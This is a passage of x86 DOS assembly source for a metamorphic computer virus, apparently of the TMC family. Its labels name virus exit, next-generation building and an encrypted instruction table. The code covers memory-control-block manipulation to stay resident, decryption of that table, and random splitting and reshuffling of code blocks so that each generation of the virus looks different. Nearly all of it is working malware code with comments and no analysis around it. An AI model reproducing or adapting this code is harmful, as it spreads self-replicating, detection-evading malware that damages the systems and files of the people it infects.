|
|||
|
|
|||
|
mov es:[01h],ax ; Store 16-bit random number
|
|||
|
pop cx ; Load CX from stack
|
|||
|
|
|||
|
ret ; Return
|
|||
|
endp
|
|||
|
|
|||
|
rnd_in_range proc near ; Random number within range
|
|||
|
or bp,bp ; Zero BP?
|
|||
|
jz zero_range ; Zero? Jump to zero_range
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
call get_rnd_num
|
|||
|
|
|||
|
xor dx,dx ; Zero DX
|
|||
|
div bp ; DX = random number within range
|
|||
|
|
|||
|
xchg ax,dx ; AX = random number within range
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
ret ; Return
|
|||
|
zero_range:
|
|||
|
xor ax,ax ; AX = random number within range
|
|||
|
|
|||
|
ret ; Return
|
|||
|
endp
|
|||
|
|
|||
|
decrypt_byte proc near ; Decrypt byte of table
|
|||
|
mov [bp+ah_],ah ; Store AH
|
|||
|
|
|||
|
mov ax,si ; AX = offset within table
|
|||
|
sub ax,bp ; Subtract delta offset from offse...
|
|||
|
sub ax,offset tmc_table ; Subtract offset of tmc_table fro...
|
|||
|
|
|||
|
mul word ptr [bp+sliding_key]
|
|||
|
add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption...
|
|||
|
|
|||
|
xor al,[si] ; AL = byte of decrypted table
|
|||
|
|
|||
|
mov ah,[bp+ah_] ; AH = stored AH
|
|||
|
|
|||
|
inc si ; Increase offset within table
|
|||
|
|
|||
|
ret ; Return
|
|||
|
endp
|
|||
|
|
|||
|
decrypt_id proc near ; Decrypt block identification in ...
|
|||
|
call decrypt_byte
|
|||
|
mov ah,al ; AL = byte of decrypted table
|
|||
|
|
|||
|
call decrypt_byte
|
|||
|
xchg al,ah ; AL = byte of decrypted table
|
|||
|
|
|||
|
ret ; Return
|
|||
|
endp
|
|||
|
virus_exit:
|
|||
|
pop es ; Load ES from stack
|
|||
|
|
|||
|
mov ah,49h ; Free memory
|
|||
|
int 21h
|
|||
|
pop bx ; Load BX from stack
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
mov ds,ax ; DS = segment of PSP for current ...
|
|||
|
mov es,ax ; DS = segment of PSP for current ...
|
|||
|
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
int 21h
|
|||
|
|
|||
|
lea bx,[bp+jmp_imm32] ; BX = offset of jmp_imm32
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial IP)
|
|||
|
mov cs:[bx+01h],ax ; Store initial IP
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial CS ...)
|
|||
|
mov cs:[bx+03h],ax ; Store initial CS relative to sta...
|
|||
|
|
|||
|
pop ax ; Load AX from stack (initial SP)
|
|||
|
pop ss ; Load SS from stack (initial SS ...)
|
|||
|
|
|||
|
mov sp,ax ; SP = stack pointer
|
|||
|
|
|||
|
jmp jmp_imm32
|
|||
|
|
|||
|
jmp_imm32 equ $ ; Offset of JMP imm32 (opcode 0eah)
|
|||
|
db 11101010b ; JMP imm32 (opcode 0eah)
|
|||
|
dd 00h ; Pointer to virus in top of memory
|
|||
|
ah_ db 00h ; Accumulator register (high-orde...)
|
|||
|
probability dw 32h ; Probability
|
|||
|
crypt_key db 00h ; 8-bit encryption/decryption key
|
|||
|
sliding_key dw 00h ; 8-bit sliding encryption/decrypt...
|
|||
|
executa_stat db 00h ; Executable status
|
|||
|
origin_code db 11000011b,02h dup(00h)
|
|||
|
initial_cs dw 0fff0h ; Initial CS relative to start of ...
|
|||
|
initial_ss dw 0fff0h ; Initial SS relative to start of ...
|
|||
|
initial_ip dw 100h ; Initial IP
|
|||
|
incorrect_ip dw 100h ; Incorrect IP
|
|||
|
initial_sp dw 0fffeh ; Initial SP
|
|||
|
new_mcb_size dw 1000h ; New size in paragraphs
|
|||
|
mcb_size dw 0ffffh ; Size of memory block in paragraphs
|
|||
|
mcb_size_ dw 00h ; Size of memory block in paragraphs
|
|||
|
program_seg dw 00h ; Segment of PSP for current process
|
|||
|
virus_length dw 00h ; Length of virus
|
|||
|
vir_exit_off dw 00h ; Offset of virus_exit
|
|||
|
table_begin:
|
|||
|
first_table:
|
|||
|
tmc_table db 11101111b ; End of block
|
|||
|
db 11101110b ; Beginning of block
|
|||
|
dw 00h ; Block identification of tmc_table
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bp,1234h ; BP = delta offset
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
cld ; Clear direction flag
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,ds ; AX = segment of PSP for current ...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bp+1234h],ax ; Store segment of PSP for current...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0befh ; Pointer to program_seg_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; AX = segment of current Memory C...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ds,ax ; DS = segment of current Memory C...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,ds:[03h] ; AX = size of memory block in par...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,1900h ; Insufficient memory?
|
|||
|
|
|||
|
db 01110010b+10000000b ; Below? Jump to terminate_
|
|||
|
dw 0beeh ; Pointer to terminate_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push cs ; Save CS at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ds ; Load DS from stack (CS)
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov [bp+1234h],ax ; Store size of memory block in p...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1394h ; Pointer to mcb_size___
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov bx,[bp+1234h] ; BX = new size in paragraphs
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1393h ; Pointer to new_mcb_siz
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to terminate_
|
|||
|
dw 0beeh ; Pointer to terminate_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,48h ; Allocate memory
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov bx,[bp+1234h] ; BX = size of memory block in par...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1394h ; Pointer to mcb_size___
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
sub bx,[bp+1234h] ; Subtract new size in paragraphs ...
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1393h ; Pointer to new_mcb_siz
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec bx ; BX = number of paragraphs to all...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp bx,0c00h ; Insufficient memory?
|
|||
|
|
|||
|
db 01110010b+10000000b ; Below? Jump to terminate_
|
|||
|
dw 0beeh ; Pointer to terminate_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to terminate_
|
|||
|
dw 0beeh ; Pointer to terminate_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov es,ax ; ES = segment of allocated memory
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov es:[01h],0deadh ; Store 16-bit random number
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov word ptr es:[0ch],00h
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov es:[04h],1000h ; Store offset of block information
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i...
|
|||
|
|
|||
|
db 07h ; Seven bytes instruction
|
|||
|
|
|||
|
mov es:[08h],3000h ; Store offset of data information
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
lea si,[bp+1234h] ; SI = offset of tmc_table_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 4c5h ; Pointer to tmc_table_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov bx,4000h ; BX = offset of next virus genera...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0fa0h ; Pointer to initial_tmc
|
|||
|
db 11101111b ; End of block
|
|||
|
initial_tmc_ db 11101110b ; Beginning of block
|
|||
|
dw 0fa0h ; Block identification of initial_tmc_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor ax,ax ; Zero AX
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
tmc_ini_loo db 11101110b ; Beginning of block
|
|||
|
dw 0bb8h ; Block identification of tmc_ini_...
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
add si,ax ; SI = offset of block or instruct...
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
or al,al ; End of table?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Zero? Jump to calc_blocks_
|
|||
|
dw 0bbch ; Pointer to calc_blocks_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
|
|||
|
|
|||
|
db 01110011b+10000000b ; Above or equal? Jump to exam_blo__
|
|||
|
dw 0bb9h ; Pointer to exam_blo__
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,10h ; Data?
|
|||
|
|
|||
|
db 01110110b+10000000b ; Below or equal? Jump to tmc_ini_...
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub al,10h ; AL = length of data
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_blo__ db 11101110b ; Beginning of block
|
|||
|
dw 0bb9h ; Block identification of exam_blo__
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_blo___
|
|||
|
dw 0bbah ; Pointer to exam_blo___
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,00h ; Don't add anything to offset wit...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_blo___ db 11101110b ; Beginning of block
|
|||
|
dw 0bbah ; Block identification of exam_blo___
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101110b ; Beginning of block?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to next_byte_
|
|||
|
dw 0bbbh ; Pointer to next_byte_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,si ; AX = offset of block identification
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; AX = offset of block within table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store offset of block within table
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,0ffffh ; Block is still in one part
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,02h ; Add two to offset within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
next_byte_ db 11101110b ; Beginning of block
|
|||
|
dw 0bbbh ; Block identification of next_byte_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,02h ; Add two to offset within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bb8h ; Pointer to tmc_ini_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
calc_blocks_ db 11101110b ; Beginning of block
|
|||
|
dw 0bbch ; Block identification of calc_blo...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
lea ax,[di-10h] ; AX = number of blocks multiplied...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr ax,01h ; Divide number of blocks by two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shr ax,01h ; Divide number of blocks by two
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov es:[0ah],ax ; Store number of blocks
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor ax,ax ; End of table
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store end of table
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,es:[di] ; SI = offset of block within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc0h ; Pointer to exam_bl
|
|||
|
db 11101111b ; End of block
|
|||
|
split_bloc db 11101110b ; Beginning of block
|
|||
|
dw 0bbdh ; Block identification of split_bloc
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push bp ; Save BP at stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov bp,es:[0ah] ; BP = number of blocks
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bd5h ; Pointer to rnd_in_rang
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bp ; Load BP from stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shl ax,01h ; Multiply random number with two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shl ax,01h ; Multiply random number with two
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,10h ; Add ten to random number
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,ax ; DI = random offset within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bbeh ; Pointer to exam_nxt_bl_
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_nxt_bl_ db 11101110b ; Beginning of block
|
|||
|
dw 0bbeh ; Block identification of exam_nxt...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add di,04h ; DI = offset of next offset withi...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,es:[di] ; SI = offset of next block within...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
or si,si ; End of table?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to exam_blo____
|
|||
|
dw 0bbfh ; Pointer to exam_blo____
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov si,es:[di] ; SI = offset of block within table
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bbfh ; Pointer to exam_blo____
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_blo____ db 11101110b ; Beginning of block
|
|||
|
dw 0bbfh ; Block identification of exam_blo...
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec si ; Decrease offset of block within ...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_bl
|
|||
|
dw 0bc0h ; Pointer to exam_bl
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp di,ax ; End of table of blocks?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_nxt_bl_
|
|||
|
dw 0bbeh ; Pointer to exam_nxt_bl_
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bcah ; Pointer to exam_tbl_in
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_bl db 11101110b ; Beginning of block
|
|||
|
dw 0bc0h ; Block identification of exam_bl
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov ax,es:[di+02h] ; AX = block information
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,0ffffh ; Block is still in one part?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to exam_bl_
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,ax ; DI = offset of end of first part...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosb ; Store JMP imm16
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub ax,di ; Subtract offset of end of first ...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store 16-bit immediate
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_bl_ db 11101110b ; Beginning of block
|
|||
|
dw 0bc1h ; Block identification of exam_bl_
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to end_of_bloc
|
|||
|
dw 0bc9h ; Pointer to end_of_bloc
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,10h ; Data; CALL; JMP; Data reference...?
|
|||
|
|
|||
|
db 01110111b+10000000b ; Above? Jump to exam_bl__
|
|||
|
dw 0bc2h ; Pointer to exam_bl__
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push bp ; Save BP at stack
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
mov bp,[bp+1234h] ; BP = probability
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bech ; Pointer to probability_
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0bd5h ; Pointer to rnd_in_rang
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
or ax,ax ; Split up block?
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop bp ; Load BP from stack
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop ax ; Load AX from stack
|
|||
|
|
|||
|
db 01110100b+10000000b ; Zero? Jump to split_bloc_
|
|||
|
dw 0bc8h ; Pointer to split_bloc_
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc2h ; Pointer to exam_bl__
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_bl__ db 11101110b ; Beginning of block
|
|||
|
dw 0bc2h ; Block identification of exam_bl__
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
|
|||
|
db 01110100b+10000000b ; Equal? Jump to end_of_bloc
|
|||
|
dw 0bc9h ; Pointer to end_of_bloc
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
|
|||
|
|
|||
|
db 01110011b+10000000b ; Above or equal? Jump to exam_data_
|
|||
|
dw 0bc4h ; Pointer to exam_data_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,10h ; Data?
|
|||
|
|
|||
|
db 01110110b+10000000b ; Below or equal? Jump to sto_inst...
|
|||
|
dw 0bc3h ; Pointer to sto_instruc
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub al,10h ; AL = length of data
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc3h ; Pointer to sto_instruc
|
|||
|
db 11101111b ; End of block
|
|||
|
sto_instruc db 11101110b ; Beginning of block
|
|||
|
dw 0bc3h ; Block identification of sto_inst...
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; Zero CX
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,al ; CL = length of instruction
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,bx ; DI = offset within next virus ge...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0beah ; Pointer to sto_ins_loo
|
|||
|
db 11101111b ; End of block
|
|||
|
sto_ins_loo db 11101110b ; Beginning of block
|
|||
|
dw 0beah ; Block identification of store_op...
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be0h ; Pointer to decrypt_byt
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosb ; Store byte of instruction
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not zero? Jump to sto_ins_loo
|
|||
|
dw 0beah ; Pointer to sto_ins_loo
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov bx,di ; BX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_data_ db 11101110b ; Beginning of block
|
|||
|
dw 0bc4h ; Block identification of exam_data_
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101101b ; Data reference?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_bl___
|
|||
|
dw 0bc5h ; Pointer to exam_bl___
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov di,es:[08h] ; DI = offset within data information
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store offset within next virus g...
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be1h ; Pointer to decrypt_id_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov es:[08h],di ; Store offset within data informa...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bc1h ; Pointer to exam_bl_
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_bl___ db 11101110b ; Beginning of block
|
|||
|
dw 0bc5h ; Block identification of exam_bl___
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
cmp al,11101110b ; Beginning of block?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to sto_call_jm_
|
|||
|
dw 0bc7h ; Pointer to sto_call_jm_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov di,es:[04h] ; DI = offset within block informa...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store offset within next virus ge...
|
|||
|
|
|||
|
db 11101000b ; CALL imm16 (opcode 0e8h)
|
|||
|
dw 0be1h ; Pointer to decrypt_id_
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov es:[04h],di ; Store offset within block inform...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,4c5h ; Block identification of tmc_table_?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_messag
|
|||
|
dw 0bc6h ; Pointer to exam_messag
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov di,bx ; DI = offset within next virus ge...
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
lea si,[bp+1234h] ; SI = offset of tmc_table_
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 4c5h ; Pointer to tmc_table_
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,(code_end-first_table)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
rep movsb ; Move table to top of memory
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov bx,di ; BX = offset within next virus ge...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 0bebh ; Pointer to examine_nex
|
|||
|
db 11101111b ; End of block
|
|||
|
exam_messag db 11101110b ; Beginning of block
|
|||
|
dw 0bc6h ; Block identification of exam_mes...
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
cmp ax,2328h ; Block identification of message?
|
|||
|
|
|||
|
db 01110101b+10000000b ; Not equal? Jump to exam_probab
|
|||
|
dw 0bedh ; Pointer to exam_probab
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,14h ; Probability of including message
|
|||
|
|
|||
|
db 04h ; Four bytes instruction
|
|||
|
|
|||
|
cmp [bp+1234h],ax ; Include message?
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 0bech ; Pointer to probability_
|
|||
|
